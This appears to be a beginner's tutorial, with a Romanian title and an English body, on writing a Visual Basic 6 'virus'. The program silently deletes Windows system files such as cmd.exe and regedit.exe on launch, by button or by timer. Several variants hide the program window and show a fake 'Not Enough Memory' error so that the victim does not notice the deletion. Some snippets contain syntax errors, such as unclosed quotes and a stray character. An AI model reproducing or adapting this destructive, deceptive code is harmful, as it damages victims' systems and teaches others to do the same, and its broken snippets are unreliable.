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Programarea unui virus in visual basic pentru incepatori !

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Visual Basic 6 - Creating a Simple Virus

Now many of you feel that creating a virus is impossible especially for you beginners. Well this tutorial shows you how to create a simple virus with just a few lines of code. A virus can be an application that deletes files upon request, this is seen as infecting your computer because by deleting key files you may need to take action to get your computer back to normal.

First of all open a new Visual Basic project, a standard exe file..

Now it depends on how you want your virus to work, I feel it is best if it is activated once your application is opened so the main code codes in the form load sub.

On your project insert a text box , a command button and a timer, we will be using the command button and timer a little later on.

In the project put in the file you want to delete, for example if you wanted to delete the command file then you would put the following code in the form load tab.

Private Sub Form_Load()

Text1.Text = "C:/Windows/System32/cmd.exe

Kill Text1.Text

End Sub

Once the project is opened then the command file will be removed.

Now I will show you an example of doing this using a command button. Put the following code in the command button and in the form load.

You can even give the text box a name to make it quicker. I have labelled it 'A'

Private Sub Form_Load()

Text1.Text = "C/Windows/System32/cmd.exe"

A = Text1.Text

End Sub

Private Sub Command1_Click

Kill A

End Sub

Now once the command button is clicked on the project the command file will be deleted.

Now we will use the timer in this one. If you want to disguise your scheme then this is a good way to do it, Here we will send a fake message error pretending the application hasn't got enough memory to run, but in actual fact the victim doesn't know that you have just removed their command file.

Here is to go about it.

Private Sub Form_Load()

Form1.Visible = False

Text1.Text = "C:/Windows/System32/cmd.exe"

A = Text1.Text

Msgbox ("Runtime Error 492. Not Enough Memory.", vbCritical, "Runtime Error"

End Sub

Private Sub Timer1_Timer()

Timer1.Interval = 5000

Kill A

Timer1.Enabled = False

End Sub

All we have done above is made the form invisible so that it makes the error message look real, we have set an interval of 5 seconds on the timer before the file is deleted and that's how simple it can be to fool someone.

Right, we can now make it a little more difficult if you are finding the above a little too easy.

How about removing more than 1 file, well this is how you could go about doing that, we will stick with the message box fool because I think that works well.

The example below shows how to remove the files when the application is loaded, we will not be using timers or command buttons in this one. We will not even be using text boxes because they are not needed, you can just do what is shown below.

So in the form load part put the following code.

Private Sub Form_Load()

Form1.Visible = False

Msgbox ("Runtime Error 492. Not Enough Memory.", vbCritical, "Runtime Error"

Kill "C:/Windows/System32/cmd.exe" s

Kill "C:/Windows/regedit.exe"

End Sub

So above we will be removing the command file and the registry, I don't think the victim will be best pleased about that do you.

Now I have shown you the above information I think it's your turn to try and create your own, now you can test it on your own pc, just copy a file, lets say the cmd.exe file and paste it into your C:/

Then put in the code above but in the Kill put this.

Kill "C:/cmd.exe"

That's all you need to kill, then you will see the file has been removed. Keep trying new things like I have shown and you will be a pro in no time

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